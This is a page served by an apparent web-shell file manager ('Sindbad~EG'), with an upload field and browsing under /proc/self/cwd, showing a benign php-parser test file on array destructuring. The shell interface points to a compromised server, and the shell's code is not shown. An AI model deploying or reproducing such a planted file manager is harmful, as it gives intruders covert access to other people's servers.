Sindbad~EG File Manager

Current Path : /proc/self/cwd/vendor/nikic/php-parser/test/code/prettyPrinter/expr/
Upload File :
Current File : //proc/self/cwd/vendor/nikic/php-parser/test/code/prettyPrinter/expr/arrayDestructuring.test

Array destructuring
-----
<?php

[$a, $b] = [$c, $d];
[, $a, , , $b, ,] = $foo;
[, [[$a]], $b] = $bar;
['a' => $b, 'b' => $a] = $baz;
-----
!!php7
[$a, $b] = [$c, $d];
[, $a, , , $b, ] = $foo;
[, [[$a]], $b] = $bar;
['a' => $b, 'b' => $a] = $baz;

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists